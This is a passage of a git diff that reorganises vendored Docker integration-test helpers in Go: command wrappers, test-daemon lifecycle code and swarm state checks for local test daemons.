command +func Docker(cmd icmd.Cmd, cmdOperators ...CmdOperator) *icmd.Result { + for _, op := range cmdOperators { + deferFn := op(&cmd) + if deferFn != nil { + defer deferFn() + } + } + appendDocker(&cmd) + if err := validateArgs(cmd.Command...); err != nil { + return &icmd.Result{ + Error: err, + } + } + return icmd.RunCmd(cmd) +} + +// validateArgs is a checker to ensure tests are not running commands which are +// not supported on platforms. Specifically on Windows this is 'busybox top'. +func validateArgs(args ...string) error { + if testEnv.OSType != "windows" { + return nil + } + foundBusybox := -1 + for key, value := range args { + if strings.ToLower(value) == "busybox" { + foundBusybox = key + } + if (foundBusybox != -1) && (key == foundBusybox+1) && (strings.ToLower(value) == "top") { + return errors.New("cannot use 'busybox top' in tests on Windows. Use runSleepingContainer()") + } + } + return nil +} + +// Build executes the specified docker build command +func Build(name string) icmd.Cmd { + return icmd.Command("build", "-t", name) +} + +// Inspect executes the specified docker inspect command +func Inspect(name string) icmd.Cmd { + return icmd.Command("inspect", name) +} + +// Format sets the specified format with --format flag +func Format(format string) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Command = append( + []string{cmd.Command[0]}, + append([]string{"--format", fmt.Sprintf("{{%s}}", format)}, cmd.Command[1:]...)..., + ) + return nil + } +} + +func appendDocker(cmd *icmd.Cmd) { + cmd.Command = append([]string{testEnv.DockerBinary()}, cmd.Command...) +} + +// Args build an icmd.Cmd struct from the specified arguments +func Args(args ...string) icmd.Cmd { + switch len(args) { + case 0: + return icmd.Cmd{} + case 1: + return icmd.Command(args[0]) + default: + return icmd.Command(args[0], args[1:]...) + } +} + +// Daemon points to the specified daemon +func Daemon(d *daemon.Daemon) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Command = append([]string{"--host", d.Sock()}, cmd.Command...) + return nil + } +} + +// WithTimeout sets the timeout for the command to run +func WithTimeout(timeout time.Duration) func(cmd *icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Timeout = timeout + return nil + } +} + +// WithEnvironmentVariables sets the specified environment variables for the command to run +func WithEnvironmentVariables(envs ...string) func(cmd *icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Env = envs + return nil + } +} + +// WithFlags sets the specified flags for the command to run +func WithFlags(flags ...string) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Command = append(cmd.Command, flags...) + return nil + } +} + +// InDir sets the folder in which the command should be executed +func InDir(path string) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Dir = path + return nil + } +} + +// WithStdout sets the standard output writer of the command +func WithStdout(writer io.Writer) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Stdout = writer + return nil + } +} + +// WithStdin sets the standard input reader for the command +func WithStdin(stdin io.Reader) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Stdin = stdin + return nil + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon.go b/vendor/github.com/docker/docker/integration-cli/daemon.go deleted file mode 100644 index 9fd3f1e82d..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/daemon.go +++ /dev/null @@ -1,608 +0,0 @@ -package main - -import ( - "bytes" - "encoding/json" - "errors" - "fmt" - "io" - "net/http" - "os" - "os/exec" - "path/filepath" - "strconv" - "strings" - "time" - - "github.com/docker/docker/api/types/events" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/go-connections/sockets" - "github.com/docker/go-connections/tlsconfig" - "github.com/go-check/check" -) - -var daemonSockRoot = filepath.Join(os.TempDir(), "docker-integration") - -// Daemon represents a Docker daemon for the testing framework. -type Daemon struct { - GlobalFlags []string - - id string - c *check.C - logFile *os.File - folder string - root string - stdin io.WriteCloser - stdout, stderr io.ReadCloser - cmd *exec.Cmd - storageDriver string - wait chan error - userlandProxy bool - useDefaultHost bool - useDefaultTLSHost bool - execRoot string -} - -type clientConfig struct { - transport *http.Transport - scheme string - addr string -} - -// NewDaemon returns a Daemon instance to be used for testing. -// This will create a directory such as d123456789 in the folder specified by $DEST. -// The daemon will not automatically start. -func NewDaemon(c *check.C) *Daemon { - dest := os.Getenv("DEST") - c.Assert(dest, check.Not(check.Equals), "", check.Commentf("Please set the DEST environment variable")) - - err := os.MkdirAll(daemonSockRoot, 0700) - c.Assert(err, checker.IsNil, check.Commentf("could not create daemon socket root")) - - id := fmt.Sprintf("d%s", stringid.TruncateID(stringid.GenerateRandomID())) - dir := filepath.Join(dest, id) - daemonFolder, err := filepath.Abs(dir) - c.Assert(err, check.IsNil, check.Commentf("Could not make %q an absolute path", dir)) - daemonRoot := filepath.Join(daemonFolder, "root") - - c.Assert(os.MkdirAll(daemonRoot, 0755), check.IsNil, check.Commentf("Could not create daemon root %q", dir)) - - userlandProxy := true - if env := os.Getenv("DOCKER_USERLANDPROXY"); env != "" { - if val, err := strconv.ParseBool(env); err != nil { - userlandProxy = val - } - } - - return &Daemon{ - id: id, - c: c, - folder: daemonFolder, - root: daemonRoot, - storageDriver: os.Getenv("DOCKER_GRAPHDRIVER"), - userlandProxy: userlandProxy, - execRoot: filepath.Join(os.TempDir(), "docker-execroot", id), - } -} - -// RootDir returns the root directory of the daemon. -func (d *Daemon) RootDir() string { - return d.root -} - -func (d *Daemon) getClientConfig() (*clientConfig, error) { - var ( - transport *http.Transport - scheme string - addr string - proto string - ) - if d.useDefaultTLSHost { - option := &tlsconfig.Options{ - CAFile: "fixtures/https/ca.pem", - CertFile: "fixtures/https/client-cert.pem", - KeyFile: "fixtures/https/client-key.pem", - } - tlsConfig, err := tlsconfig.Client(*option) - if err != nil { - return nil, err - } - transport = &http.Transport{ - TLSClientConfig: tlsConfig, - } - addr = fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort) - scheme = "https" - proto = "tcp" - } else if d.useDefaultHost { - addr = opts.DefaultUnixSocket - proto = "unix" - scheme = "http" - transport = &http.Transport{} - } else { - addr = d.sockPath() - proto = "unix" - scheme = "http" - transport = &http.Transport{} - } - - d.c.Assert(sockets.ConfigureTransport(transport, proto, addr), check.IsNil) - - return &clientConfig{ - transport: transport, - scheme: scheme, - addr: addr, - }, nil -} - -// Start will start the daemon and return once it is ready to receive requests. -// You can specify additional daemon flags. -func (d *Daemon) Start(args ...string) error { - logFile, err := os.OpenFile(filepath.Join(d.folder, "docker.log"), os.O_RDWR|os.O_CREATE|os.O_APPEND, 0600) - d.c.Assert(err, check.IsNil, check.Commentf("[%s] Could not create %s/docker.log", d.id, d.folder)) - - return d.StartWithLogFile(logFile, args...) -} - -// StartWithLogFile will start the daemon and attach its streams to a given file. -func (d *Daemon) StartWithLogFile(out *os.File, providedArgs ...string) error { - dockerdBinary, err := exec.LookPath(dockerdBinary) - d.c.Assert(err, check.IsNil, check.Commentf("[%s] could not find docker binary in $PATH", d.id)) - - args := append(d.GlobalFlags, - "--containerd", "/var/run/docker/libcontainerd/docker-containerd.sock", - "--graph", d.root, - "--exec-root", d.execRoot, - "--pidfile", fmt.Sprintf("%s/docker.pid", d.folder), - fmt.Sprintf("--userland-proxy=%t", d.userlandProxy), - ) - if experimentalDaemon { - args = append(args, "--experimental", "--init") - } - if !(d.useDefaultHost || d.useDefaultTLSHost) { - args = append(args, []string{"--host", d.sock()}...) - } - if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { - args = append(args, []string{"--userns-remap", root}...) - } - - // If we don't explicitly set the log-level or debug flag(-D) then - // turn on debug mode - foundLog := false - foundSd := false - for _, a := range providedArgs { - if strings.Contains(a, "--log-level") || strings.Contains(a, "-D") || strings.Contains(a, "--debug") { - foundLog = true - } - if strings.Contains(a, "--storage-driver") { - foundSd = true - } - } - if !foundLog { - args = append(args, "--debug") - } - if d.storageDriver != "" && !foundSd { - args = append(args, "--storage-driver", d.storageDriver) - } - - args = append(args, providedArgs...) - d.cmd = exec.Command(dockerdBinary, args...) - d.cmd.Env = append(os.Environ(), "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE=1") - d.cmd.Stdout = out - d.cmd.Stderr = out - d.logFile = out - - if err := d.cmd.Start(); err != nil { - return fmt.Errorf("[%s] could not start daemon container: %v", d.id, err) - } - - wait := make(chan error) - - go func() { - wait <- d.cmd.Wait() - d.c.Logf("[%s] exiting daemon", d.id) - close(wait) - }() - - d.wait = wait - - tick := time.Tick(500 * time.Millisecond) - // make sure daemon is ready to receive requests - startTime := time.Now().Unix() - for { - d.c.Logf("[%s] waiting for daemon to start", d.id) - if time.Now().Unix()-startTime > 5 { - // After 5 seconds, give up - return fmt.Errorf("[%s] Daemon exited and never started", d.id) - } - select { - case <-time.After(2 * time.Second): - return fmt.Errorf("[%s] timeout: daemon does not respond", d.id) - case <-tick: - clientConfig, err := d.getClientConfig() - if err != nil { - return err - } - - client := &http.Client{ - Transport: clientConfig.transport, - } - - req, err := http.NewRequest("GET", "/_ping", nil) - d.c.Assert(err, check.IsNil, check.Commentf("[%s] could not create new request", d.id)) - req.URL.Host = clientConfig.addr - req.URL.Scheme = clientConfig.scheme - resp, err := client.Do(req) - if err != nil { - continue - } - if resp.StatusCode != http.StatusOK { - d.c.Logf("[%s] received status != 200 OK: %s", d.id, resp.Status) - } - d.c.Logf("[%s] daemon started", d.id) - d.root, err = d.queryRootDir() - if err != nil { - return fmt.Errorf("[%s] error querying daemon for root directory: %v", d.id, err) - } - return nil - case <-d.wait: - return fmt.Errorf("[%s] Daemon exited during startup", d.id) - } - } -} - -// StartWithBusybox will first start the daemon with Daemon.Start() -// then save the busybox image from the main daemon and load it into this Daemon instance. -func (d *Daemon) StartWithBusybox(arg ...string) error { - if err := d.Start(arg...); err != nil { - return err - } - return d.LoadBusybox() -} - -// Kill will send a SIGKILL to the daemon -func (d *Daemon) Kill() error { - if d.cmd == nil || d.wait == nil { - return errors.New("daemon not started") - } - - defer func() { - d.logFile.Close() - d.cmd = nil - }() - - if err := d.cmd.Process.Kill(); err != nil { - d.c.Logf("Could not kill daemon: %v", err) - return err - } - - if err := os.Remove(fmt.Sprintf("%s/docker.pid", d.folder)); err != nil { - return err - } - - return nil -} - -// DumpStackAndQuit sends SIGQUIT to the daemon, which triggers it to dump its -// stack to its log file and exit -// This is used primarily for gathering debug information on test timeout -func (d *Daemon) DumpStackAndQuit() { - if d.cmd == nil || d.cmd.Process == nil { - return - } - signalDaemonDump(d.cmd.Process.Pid) -} - -// Stop will send a SIGINT every second and wait for the daemon to stop. -// If it timeouts, a SIGKILL is sent. -// Stop will not delete the daemon directory. If a purged daemon is needed, -// instantiate a new one with NewDaemon. -func (d *Daemon) Stop() error { - if d.cmd == nil || d.wait == nil { - return errors.New("daemon not started") - } - - defer func() { - d.logFile.Close() - d.cmd = nil - }() - - i := 1 - tick := time.Tick(time.Second) - - if err := d.cmd.Process.Signal(os.Interrupt); err != nil { - return fmt.Errorf("could not send signal: %v", err) - } -out1: - for { - select { - case err := <-d.wait: - return err - case <-time.After(20 * time.Second): - // time for stopping jobs and run onShutdown hooks - d.c.Logf("timeout: %v", d.id) - break out1 - } - } - -out2: - for { - select { - case err := <-d.wait: - return err - case <-tick: - i++ - if i > 5 { - d.c.Logf("tried to interrupt daemon for %d times, now try to kill it", i) - break out2 - } - d.c.Logf("Attempt #%d: daemon is still running with pid %d", i, d.cmd.Process.Pid) - if err := d.cmd.Process.Signal(os.Interrupt); err != nil { - return fmt.Errorf("could not send signal: %v", err) - } - } - } - - if err := d.cmd.Process.Kill(); err != nil { - d.c.Logf("Could not kill daemon: %v", err) - return err - } - - if err := os.Remove(fmt.Sprintf("%s/docker.pid", d.folder)); err != nil { - return err - } - - return nil -} - -// Restart will restart the daemon by first stopping it and then starting it. -func (d *Daemon) Restart(arg ...string) error { - d.Stop() - // in the case of tests running a user namespace-enabled daemon, we have resolved - // d.root to be the actual final path of the graph dir after the "uid.gid" of - // remapped root is added--we need to subtract it from the path before calling - // start or else we will continue making subdirectories rather than truly restarting - // with the same location/root: - if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { - d.root = filepath.Dir(d.root) - } - return d.Start(arg...) -} - -// LoadBusybox will load the stored busybox into a newly started daemon -func (d *Daemon) LoadBusybox() error { - bb := filepath.Join(d.folder, "busybox.tar") - if _, err := os.Stat(bb); err != nil { - if !os.IsNotExist(err) { - return fmt.Errorf("unexpected error on busybox.tar stat: %v", err) - } - // saving busybox image from main daemon - if out, err := exec.Command(dockerBinary, "save", "--output", bb, "busybox:latest").CombinedOutput(); err != nil { - imagesOut, _ := exec.Command(dockerBinary, "images", "--format", "{{ .Repository }}:{{ .Tag }}").CombinedOutput() - return fmt.Errorf("could not save busybox image: %s\n%s", string(out), strings.TrimSpace(string(imagesOut))) - } - } - // loading busybox image to this daemon - if out, err := d.Cmd("load", "--input", bb); err != nil { - return fmt.Errorf("could not load busybox image: %s", out) - } - if err := os.Remove(bb); err != nil { - d.c.Logf("could not remove %s: %v", bb, err) - } - return nil -} - -func (d *Daemon) queryRootDir() (string, error) { - // update daemon root by asking /info endpoint (to support user - // namespaced daemon with root remapped uid.gid directory) - clientConfig, err := d.getClientConfig() - if err != nil { - return "", err - } - - client := &http.Client{ - Transport: clientConfig.transport, - } - - req, err := http.NewRequest("GET", "/info", nil) - if err != nil { - return "", err - } - req.Header.Set("Content-Type", "application/json") - req.URL.Host = clientConfig.addr - req.URL.Scheme = clientConfig.scheme - - resp, err := client.Do(req) - if err != nil { - return "", err - } - body := ioutils.NewReadCloserWrapper(resp.Body, func() error { - return resp.Body.Close() - }) - - type Info struct { - DockerRootDir string - } - var b []byte - var i Info - b, err = readBody(body) - if err == nil && resp.StatusCode == http.StatusOK { - // read the docker root dir - if err = json.Unmarshal(b, &i); err == nil { - return i.DockerRootDir, nil - } - } - return "", err -} - -func (d *Daemon) sock() string { - return fmt.Sprintf("unix://" + d.sockPath()) -} - -func (d *Daemon) sockPath() string { - return filepath.Join(daemonSockRoot, d.id+".sock") -} - -func (d *Daemon) waitRun(contID string) error { - args := []string{"--host", d.sock()} - return waitInspectWithArgs(contID, "{{.State.Running}}", "true", 10*time.Second, args...) -} - -func (d *Daemon) getBaseDeviceSize(c *check.C) int64 { - infoCmdOutput, _, err := runCommandPipelineWithOutput( - exec.Command(dockerBinary, "-H", d.sock(), "info"), - exec.Command("grep", "Base Device Size"), - ) - c.Assert(err, checker.IsNil) - basesizeSlice := strings.Split(infoCmdOutput, ":") - basesize := strings.Trim(basesizeSlice[1], " ") - basesize = strings.Trim(basesize, "\n")[:len(basesize)-3] - basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64) - c.Assert(err, checker.IsNil) - basesizeBytes := int64(basesizeFloat) * (1024 * 1024 * 1024) - return basesizeBytes -} - -// Cmd will execute a docker CLI command against this Daemon. -// Example: d.Cmd("version") will run docker -H unix://path/to/unix.sock version -func (d *Daemon) Cmd(args ...string) (string, error) { - b, err := d.command(args...).CombinedOutput() - return string(b), err -} - -func (d *Daemon) command(args ...string) *exec.Cmd { - return exec.Command(dockerBinary, d.prependHostArg(args)...) -} - -func (d *Daemon) prependHostArg(args []string) []string { - for _, arg := range args { - if arg == "--host" || arg == "-H" { - return args - } - } - return append([]string{"--host", d.sock()}, args...) -} - -// SockRequest executes a socket request on a daemon and returns statuscode and output. -func (d *Daemon) SockRequest(method, endpoint string, data interface{}) (int, []byte, error) { - jsonData := bytes.NewBuffer(nil) - if err := json.NewEncoder(jsonData).Encode(data); err != nil { - return -1, nil, err - } - - res, body, err := d.SockRequestRaw(method, endpoint, jsonData, "application/json") - if err != nil { - return -1, nil, err - } - b, err := readBody(body) - return res.StatusCode, b, err -} - -// SockRequestRaw executes a socket request on a daemon and returns an http -// response and a reader for the output data. -func (d *Daemon) SockRequestRaw(method, endpoint string, data io.Reader, ct string) (*http.Response, io.ReadCloser, error) { - return sockRequestRawToDaemon(method, endpoint, data, ct, d.sock()) -} - -// LogFileName returns the path the the daemon's log file -func (d *Daemon) LogFileName() string { - return d.logFile.Name() -} - -func (d *Daemon) getIDByName(name string) (string, error) { - return d.inspectFieldWithError(name, "Id") -} - -func (d *Daemon) activeContainers() (ids []string) { - out, _ := d.Cmd("ps", "-q") - for _, id := range strings.Split(out, "\n") { - if id = strings.TrimSpace(id); id != "" { - ids = append(ids, id) - } - } - return -} - -func (d *Daemon) inspectFilter(name, filter string) (string, error) { - format := fmt.Sprintf("{{%s}}", filter) - out, err := d.Cmd("inspect", "-f", format, name) - if err != nil { - return "", fmt.Errorf("failed to inspect %s: %s", name, out) - } - return strings.TrimSpace(out), nil -} - -func (d *Daemon) inspectFieldWithError(name, field string) (string, error) { - return d.inspectFilter(name, fmt.Sprintf(".%s", field)) -} - -func (d *Daemon) findContainerIP(id string) string { - out, err := d.Cmd("inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.bridge.IPAddress }}'"), id) - if err != nil { - d.c.Log(err) - } - return strings.Trim(out, " \r\n'") -} - -func (d *Daemon) buildImageWithOut(name, dockerfile string, useCache bool, buildFlags ...string) (string, int, error) { - buildCmd := buildImageCmdWithHost(name, dockerfile, d.sock(), useCache, buildFlags...) - return runCommandWithOutput(buildCmd) -} - -func (d *Daemon) checkActiveContainerCount(c *check.C) (interface{}, check.CommentInterface) { - out, err := d.Cmd("ps", "-q") - c.Assert(err, checker.IsNil) - if len(strings.TrimSpace(out)) == 0 { - return 0, nil - } - return len(strings.Split(strings.TrimSpace(out), "\n")), check.Commentf("output: %q", string(out)) -} - -func (d *Daemon) reloadConfig() error { - if d.cmd == nil || d.cmd.Process == nil { - return fmt.Errorf("daemon is not running") - } - - errCh := make(chan error) - started := make(chan struct{}) - go func() { - _, body, err := sockRequestRawToDaemon("GET", "/events", nil, "", d.sock()) - close(started) - if err != nil { - errCh <- err - } - defer body.Close() - dec := json.NewDecoder(body) - for { - var e events.Message - if err := dec.Decode(&e); err != nil { - errCh <- err - return - } - if e.Type != events.DaemonEventType { - continue - } - if e.Action != "reload" { - continue - } - close(errCh) // notify that we are done - return - } - }() - - <-started - if err := signalDaemonReload(d.cmd.Process.Pid); err != nil { - return fmt.Errorf("error signaling daemon reload: %v", err) - } - select { - case err := <-errCh: - if err != nil { - return fmt.Errorf("error waiting for daemon reload event: %v", err) - } - case <-time.After(30 * time.Second): - return fmt.Errorf("timeout waiting for daemon reload event") - } - return nil -} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon/daemon.go b/vendor/github.com/docker/docker/integration-cli/daemon/daemon.go new file mode 100644 index 0000000000..3d1fa38d5d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon/daemon.go @@ -0,0 +1,143 @@ +package daemon // import "github.com/docker/docker/integration-cli/daemon" + +import ( + "fmt" + "strings" + "time" + + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/daemon" + "github.com/go-check/check" + "github.com/pkg/errors" + "gotest.tools/assert" + "gotest.tools/icmd" +) + +type testingT interface { + assert.TestingT + logT + Fatalf(string, ...interface{}) +} + +type logT interface { + Logf(string, ...interface{}) +} + +// Daemon represents a Docker daemon for the testing framework. +type Daemon struct { + *daemon.Daemon + dockerBinary string +} + +// New returns a Daemon instance to be used for testing. +// This will create a directory such as d123456789 in the folder specified by $DOCKER_INTEGRATION_DAEMON_DEST or $DEST. +// The daemon will not automatically start. +func New(t testingT, dockerBinary string, dockerdBinary string, ops ...func(*daemon.Daemon)) *Daemon { + ops = append(ops, daemon.WithDockerdBinary(dockerdBinary)) + d := daemon.New(t, ops...) + return &Daemon{ + Daemon: d, + dockerBinary: dockerBinary, + } +} + +// Cmd executes a docker CLI command against this daemon. +// Example: d.Cmd("version") will run docker -H unix://path/to/unix.sock version +func (d *Daemon) Cmd(args ...string) (string, error) { + result := icmd.RunCmd(d.Command(args...)) + return result.Combined(), result.Error +} + +// Command creates a docker CLI command against this daemon, to be executed later. +// Example: d.Command("version") creates a command to run "docker -H unix://path/to/unix.sock version" +func (d *Daemon) Command(args ...string) icmd.Cmd { + return icmd.Command(d.dockerBinary, d.PrependHostArg(args)...) +} + +// PrependHostArg prepend the specified arguments by the daemon host flags +func (d *Daemon) PrependHostArg(args []string) []string { + for _, arg := range args { + if arg == "--host" || arg == "-H" { + return args + } + } + return append([]string{"--host", d.Sock()}, args...) +} + +// GetIDByName returns the ID of an object (container, volume, …) given its name +func (d *Daemon) GetIDByName(name string) (string, error) { + return d.inspectFieldWithError(name, "Id") +} + +// InspectField returns the field filter by 'filter' +func (d *Daemon) InspectField(name, filter string) (string, error) { + return d.inspectFilter(name, filter) +} + +func (d *Daemon) inspectFilter(name, filter string) (string, error) { + format := fmt.Sprintf("{{%s}}", filter) + out, err := d.Cmd("inspect", "-f", format, name) + if err != nil { + return "", errors.Errorf("failed to inspect %s: %s", name, out) + } + return strings.TrimSpace(out), nil +} + +func (d *Daemon) inspectFieldWithError(name, field string) (string, error) { + return d.inspectFilter(name, fmt.Sprintf(".%s", field)) +} + +// CheckActiveContainerCount returns the number of active containers +// FIXME(vdemeester) should re-use ActivateContainers in some way +func (d *Daemon) CheckActiveContainerCount(c *check.C) (interface{}, check.CommentInterface) { + out, err := d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil) + if len(strings.TrimSpace(out)) == 0 { + return 0, nil + } + return len(strings.Split(strings.TrimSpace(out), "\n")), check.Commentf("output: %q", string(out)) +} + +// WaitRun waits for a container to be running for 10s +func (d *Daemon) WaitRun(contID string) error { + args := []string{"--host", d.Sock()} + return WaitInspectWithArgs(d.dockerBinary, contID, "{{.State.Running}}", "true", 10*time.Second, args...) +} + +// WaitInspectWithArgs waits for the specified expression to be equals to the specified expected string in the given time. +// Deprecated: use cli.WaitCmd instead +func WaitInspectWithArgs(dockerBinary, name, expr, expected string, timeout time.Duration, arg ...string) error { + after := time.After(timeout) + + args := append(arg, "inspect", "-f", expr, name) + for { + result := icmd.RunCommand(dockerBinary, args...) + if result.Error != nil { + if !strings.Contains(strings.ToLower(result.Stderr()), "no such") { + return errors.Errorf("error executing docker inspect: %v\n%s", + result.Stderr(), result.Stdout()) + } + select { + case <-after: + return result.Error + default: + time.Sleep(10 * time.Millisecond) + continue + } + } + + out := strings.TrimSpace(result.Stdout()) + if out == expected { + break + } + + select { + case <-after: + return errors.Errorf("condition \"%q == %q\" not true in time (%v)", out, expected, timeout) + default: + } + + time.Sleep(100 * time.Millisecond) + } + return nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon/daemon_swarm.go b/vendor/github.com/docker/docker/integration-cli/daemon/daemon_swarm.go new file mode 100644 index 0000000000..4a6ce8a5c5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon/daemon_swarm.go @@ -0,0 +1,197 @@ +package daemon // import "github.com/docker/docker/integration-cli/daemon" + +import ( + "context" + "fmt" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/go-check/check" + "gotest.tools/assert" +) + +// CheckServiceTasksInState returns the number of tasks with a matching state, +// and optional message substring. +func (d *Daemon) CheckServiceTasksInState(service string, state swarm.TaskState, message string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + tasks := d.GetServiceTasks(c, service) + var count int + for _, task := range tasks { + if task.Status.State == state { + if message == "" || strings.Contains(task.Status.Message, message) { + count++ + } + } + } + return count, nil + } +} + +// CheckServiceTasksInStateWithError returns the number of tasks with a matching state, +// and optional message substring. +func (d *Daemon) CheckServiceTasksInStateWithError(service string, state swarm.TaskState, errorMessage string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + tasks := d.GetServiceTasks(c, service) + var count int + for _, task := range tasks { + if task.Status.State == state { + if errorMessage == "" || strings.Contains(task.Status.Err, errorMessage) { + count++ + } + } + } + return count, nil + } +} + +// CheckServiceRunningTasks returns the number of running tasks for the specified service +func (d *Daemon) CheckServiceRunningTasks(service string) func(*check.C) (interface{}, check.CommentInterface) { + return d.CheckServiceTasksInState(service, swarm.TaskStateRunning, "") +} + +// CheckServiceUpdateState returns the current update state for the specified service +func (d *Daemon) CheckServiceUpdateState(service string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + service := d.GetService(c, service) + if service.UpdateStatus == nil { + return "", nil + } + return service.UpdateStatus.State, nil + } +} + +// CheckPluginRunning returns the runtime state of the plugin +func (d *Daemon) CheckPluginRunning(plugin string) func(c *check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + apiclient, err := d.NewClient() + assert.NilError(c, err) + resp, _, err := apiclient.PluginInspectWithRaw(context.Background(), plugin) + if client.IsErrNotFound(err) { + return false, check.Commentf("%v", err) + } + assert.NilError(c, err) + return resp.Enabled, check.Commentf("%+v", resp) + } +} + +// CheckPluginImage returns the runtime state of the plugin +func (d *Daemon) CheckPluginImage(plugin string) func(c *check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + apiclient, err := d.NewClient() + assert.NilError(c, err) + resp, _, err := apiclient.PluginInspectWithRaw(context.Background(), plugin) + if client.IsErrNotFound(err) { + return false, check.Commentf("%v", err) + } + assert.NilError(c, err) + return resp.PluginReference, check.Commentf("%+v", resp) + } +} + +// CheckServiceTasks returns the number of tasks for the specified service +func (d *Daemon) CheckServiceTasks(service string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + tasks := d.GetServiceTasks(c, service) + return len(tasks), nil + } +} + +// CheckRunningTaskNetworks returns the number of times each network is referenced from a task. +func (d *Daemon) CheckRunningTaskNetworks(c *check.C) (interface{}, check.CommentInterface) { + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + filterArgs := filters.NewArgs() + filterArgs.Add("desired-state", "running") + + options := types.TaskListOptions{ + Filters: filterArgs, + } + + tasks, err := cli.TaskList(context.Background(), options) + c.Assert(err, checker.IsNil) + + result := make(map[string]int) + for _, task := range tasks { + for _, network := range task.Spec.Networks { + result[network.Target]++ + } + } + return result, nil +} + +// CheckRunningTaskImages returns the times each image is running as a task. +func (d *Daemon) CheckRunningTaskImages(c *check.C) (interface{}, check.CommentInterface) { + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + filterArgs := filters.NewArgs() + filterArgs.Add("desired-state", "running") + + options := types.TaskListOptions{ + Filters: filterArgs, + } + + tasks, err := cli.TaskList(context.Background(), options) + c.Assert(err, checker.IsNil) + + result := make(map[string]int) + for _, task := range tasks { + if task.Status.State == swarm.TaskStateRunning && task.Spec.ContainerSpec != nil { + result[task.Spec.ContainerSpec.Image]++ + } + } + return result, nil +} + +// CheckNodeReadyCount returns the number of ready node on the swarm +func (d *Daemon) CheckNodeReadyCount(c *check.C) (interface{}, check.CommentInterface) { + nodes := d.ListNodes(c) + var readyCount int + for _, node := range nodes { + if node.Status.State == swarm.NodeStateReady { + readyCount++ + } + } + return readyCount, nil +} + +// CheckLocalNodeState returns the current swarm node state +func (d *Daemon) CheckLocalNodeState(c *check.C) (interface{}, check.CommentInterface) { + info := d.SwarmInfo(c) + return info.LocalNodeState, nil +} + +// CheckControlAvailable returns the current swarm control available +func (d *Daemon) CheckControlAvailable(c *check.C) (interface{}, check.CommentInterface) { + info := d.SwarmInfo(c) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + return info.ControlAvailable, nil +} + +// CheckLeader returns whether there is a leader on the swarm or not +func (d *Daemon) CheckLeader(c *check.C) (interface{}, check.CommentInterface) { + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + errList := check.Commentf("could not get node list") + + ls, err := cli.NodeList(context.Background(), types.NodeListOptions{}) + if err != nil { + return err, errList + } + + for _, node := range ls { + if node.ManagerStatus != nil && node.ManagerStatus.Leader { + return nil, nil + } + } + return fmt.Errorf("no leader"), check.Commentf("could not find leader") +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go b/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go deleted file mode 100644 index 199bce0e7b..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go +++ /dev/null @@ -1,419 +0,0 @@ -package main - -import ( - "encoding/json" - "fmt" - "net/http" - "strings" - "time" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -// SwarmDaemon is a test daemon with helpers for participating in a swarm. -type SwarmDaemon struct { - *Daemon - swarm.Info - port int - listenAddr string -} - -// Init initializes a new swarm cluster. -func (d *SwarmDaemon) Init(req swarm.InitRequest) error { - if req.ListenAddr == "" { - req.ListenAddr = d.listenAddr - } - status, out, err := d.SockRequest("POST", "/swarm/init", req) - if status != http.StatusOK { - return fmt.Errorf("initializing swarm: invalid statuscode %v, %q", status, out) - } - if err != nil { - return fmt.Errorf("initializing swarm: %v", err) - } - info, err := d.info() - if err != nil { - return err - } - d.Info = info - return nil -} - -// Join joins a daemon to an existing cluster. -func (d *SwarmDaemon) Join(req swarm.JoinRequest) error { - if req.ListenAddr == "" { - req.ListenAddr = d.listenAddr - } - status, out, err := d.SockRequest("POST", "/swarm/join", req) - if status != http.StatusOK { - return fmt.Errorf("joining swarm: invalid statuscode %v, %q", status, out) - } - if err != nil { - return fmt.Errorf("joining swarm: %v", err) - } - info, err := d.info() - if err != 